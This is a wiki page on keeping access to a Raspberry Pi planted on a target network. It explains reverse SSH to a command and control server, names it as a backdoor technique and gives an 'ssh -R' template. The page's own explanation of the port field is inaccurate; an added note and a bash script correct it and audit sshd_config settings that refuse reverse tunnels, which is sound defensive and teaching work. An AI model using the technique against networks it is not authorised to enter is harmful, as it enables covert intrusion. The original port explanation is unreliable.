RaspberryPi/Reverse SSH
From charlesreid1
How to control the Pi once it is placed on a target network? SSH is an obvious way.
Incoming SSH connections can/will be blocked by firewalls or other security measures.
Reverse SSH is a good alternative to gain an SSH shell.
Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.
SSH Command
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.
Normally, when you SSH to a machine, you execute a command like:
$ ssh user@remoteserver
But if you use the -R flag, it enables a reverse connection to the listener.
$ ssh -R [bind_address:]port:host:hostport username@remoteserver
Let's ignore bind_address for now.
The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.
host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.
Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.
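The following script is an added example, not code from this page or from charlesreid1. It does two things. First, parse_remote_spec splits a -R spec into its four fields with the meaning given in the ssh(1) man page: the SSH server (the command and control host) listens on bind_address:port and forwards every connection it receives there to host:hostport as reached from the client (the Pi). So 2222:localhost:22 makes the Pi's own sshd reachable on the server's loopback port 2222; the port the Pi uses to leave its network is the server's SSH port, chosen on the command line with -p, which is a separate setting. Second, audit_sshd_config reads an sshd_config and reports whether that server would accept such reverse tunnels at all, from the AllowTcpForwarding, GatewayPorts and PermitListen directives; this is the knob a defender turns on servers that must never act as a tunnel endpoint. The two config fragments at the bottom are constructed for the demo and written to mktemp files; Match blocks and IPv6 literals are not handled.

```shell
#!/usr/bin/env bash
# Added example (not from the charlesreid1 wiki page).
#  parse_remote_spec  splits "[bind_address:]port:host:hostport" as ssh(1) defines it:
#                     the server listens on bind_address:port and forwards to
#                     host:hostport as seen from the client. bind_address defaults
#                     to the loopback interface; an empty one or "*" means all interfaces.
#  audit_sshd_config  reports whether an sshd_config lets a client open such a tunnel.

parse_remote_spec() {
    local spec=$1 bind port host hostport p
    local -a f
    IFS=: read -r -a f <<<"$spec"           # split on ':' (IPv6 literals not handled)
    case ${#f[@]} in
        3) bind=localhost; port=${f[0]}; host=${f[1]}; hostport=${f[2]} ;;
        4) bind=${f[0]};   port=${f[1]}; host=${f[2]}; hostport=${f[3]} ;;
        *) echo "unrecognised -R spec: $spec" >&2; return 1 ;;
    esac
    [ -z "$bind" ] && bind='*'              # ssh(1): empty bind_address = all interfaces
    for p in "$port" "$hostport"; do        # both ports must be numeric
        case $p in ''|*[!0-9]*) echo "bad port in spec: $spec" >&2; return 1 ;; esac
    done
    printf 'bind=%s port=%s host=%s hostport=%s\n' "$bind" "$port" "$host" "$hostport"
}

# Prints the effective values and a verdict. Exit status 0 = reverse tunnels
# refused, 1 = reverse tunnels accepted. sshd honours the FIRST occurrence of a
# keyword, so the first value seen wins; Match blocks are not modelled here.
audit_sshd_config() {
    awk '
        { sub(/#.*/, ""); if (NF < 2) next
          k = tolower($1)
          if (!(k in val)) val[k] = tolower($2) }
        END {
          atf = ("allowtcpforwarding" in val) ? val["allowtcpforwarding"] : "yes"
          gp  = ("gatewayports"       in val) ? val["gatewayports"]       : "no"
          pl  = ("permitlisten"       in val) ? val["permitlisten"]       : "any"
          printf "AllowTcpForwarding=%s GatewayPorts=%s PermitListen=%s\n", atf, gp, pl
          if (atf == "no" || atf == "local" || pl == "none") {
              print "verdict: remote (-R) forwarding refused"; exit 0
          }
          if (gp == "no") print "note: listener bound to loopback only"
          else            print "note: GatewayPorts lets the listener bind non-loopback addresses"
          print "verdict: remote (-R) forwarding accepted"; exit 1
        }' "$1"
}

# Demo with two constructed sshd_config fragments (not real server configs).
permissive=$(mktemp); hardened=$(mktemp)
printf 'Port 22\nAllowTcpForwarding yes\n# GatewayPorts left at its default\n' >"$permissive"
printf 'AllowTcpForwarding local\nPermitListen none\n' >"$hardened"
parse_remote_spec 2222:localhost:22
for cfg in "$permissive" "$hardened"; do
    echo "--- $cfg"
    if audit_sshd_config "$cfg"; then echo "(server refuses -R)"; else echo "(server accepts -R)"; fi
done
rm -f "$permissive" "$hardened"
```

Two points worth noting from the output. With GatewayPorts at its default of no, the listener is bound to the server's loopback only, which is all a tunnel used from the server itself needs; a spec with an empty bind_address (for example :2222:localhost:22) asks sshd to bind every interface, and if GatewayPorts permits that, anyone who can reach the server's port 2222 reaches the Pi's sshd. On the server side, AllowTcpForwarding local or PermitListen none is what refuses -R requests outright, while AllowTcpForwarding no also disables -L.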